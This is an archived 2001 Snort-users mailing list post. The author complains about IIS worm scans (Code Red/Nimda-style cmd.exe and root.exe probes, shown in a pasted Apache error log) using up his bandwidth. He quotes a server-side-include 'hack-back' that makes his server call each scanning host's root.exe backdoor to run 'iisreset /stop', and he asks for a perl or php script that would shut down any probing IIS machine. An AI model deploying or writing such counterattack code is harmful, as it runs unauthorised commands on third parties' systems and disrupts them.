Snort mailing list archives
Shut them down, I have had enough...
From: "Franki" <franki () gshop com au>
Date: Wed, 19 Sep 2001 15:03:27 +0800
Hi all, I have seen in the past a php script that would shut down infected IIS servers that are trying to infect linux box's I havn't done it, because I didn't really think it was that nice a thing to do... This is the one I saw...
1) Create a file called default.ida, in there add this: <!--#exec cmd="lynx -source http://$REMOTE_ADDR/scripts/root.exe?/c+iisreset+/stop"--> On one line, if it wraps in your mail client.... 2) Then in your httpd.conf or similar... add this AddType text/html .ida AddHandler server-parsed .ida
but I checked my personal server this morning and the httpd error log looks like this. (see the end of the email) anyway, I'd like to setup the server to shutdown any IIS box that asks for cmd.exe or root.exe Does anyone know how this can be done using either perl or php??? has anyone already done it? if so where can I find it??? I am tired of this, I have a very limited bandwidth, and even if it isn't doing any damage, its chewing up the bandwidth.. and costing me money, as far as I am now concerned, they have three choices, either patch their server, pay my bandwidth bill, or get their servers shut down alot... Any help would be much appreciated. Regards Frank Perth WA [Wed Sep 19 14:47:27 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/c/winnt/system32/cmd.exe [Wed Sep 19 14:47:28 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/d/winnt/system32/cmd.exe [Wed Sep 19 14:47:31 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe [Wed Sep 19 14:47:33 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32 /cmd.exe [Wed Sep 19 14:47:34 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32 /cmd.exe [Wed Sep 19 14:47:40 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..A../..A../..A../w innt/system32/cmd.exe [Wed Sep 19 14:47:42 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe [Wed Sep 19 14:48:00 2001] [error] [client 203.47.134.211] File does not exist: /var/www/html/otherwebs/epay/default.ida [Wed Sep 19 14:48:13 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/root.exe [Wed Sep 19 14:48:14 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/MSADC/root.exe [Wed Sep 19 14:48:15 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/c/winnt/system32/cmd.exe [Wed Sep 19 14:48:16 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/d/winnt/system32/cmd.exe [Wed Sep 19 14:48:18 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe [Wed Sep 19 14:48:19 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32 /cmd.exe [Wed Sep 19 14:48:21 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32 /cmd.exe [Wed Sep 19 14:48:23 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..A../..A../..A../w innt/system32/cmd.exe [Wed Sep 19 14:48:24 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe [root@mail httpd]# tail -50 error_log [Wed Sep 19 14:53:18 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe [Wed Sep 19 14:53:18 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe [Wed Sep 19 14:53:19 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe [Wed Sep 19 14:53:20 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..A../..A../..A../wi nnt/system32/cmd.exe [Wed Sep 19 14:53:20 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe [Wed Sep 19 14:53:20 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%2f../winnt/system32/cmd.exe [Wed Sep 19 14:53:20 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/otherwebs/ezetax/_vti_bin/..%5c../..%5c../..%5c ../winnt/system32/cmd.exe [Wed Sep 19 14:53:21 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..A?../winnt/system32/cmd.exe [Wed Sep 19 14:53:21 2001] [error] [client 203.176.30.78] File does not exist: /var/www/html/otherwebs/ezetax/scripts/..%2f../winnt/system32 /cmd.exe [Wed Sep 19 14:53:22 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- Sizing a machine for Snort Muscat, Tyrone J. (Sep 18)
- Re: Sizing a machine for Snort Erek Adams (Sep 18)
- Shut them down, I have had enough... Franki (Sep 19)
- Re: Shut them down, I have had enough... Daniel Holden (Sep 19)
- Shut them down, I have had enough... Franki (Sep 19)
- Re: Sizing a machine for Snort Erek Adams (Sep 18)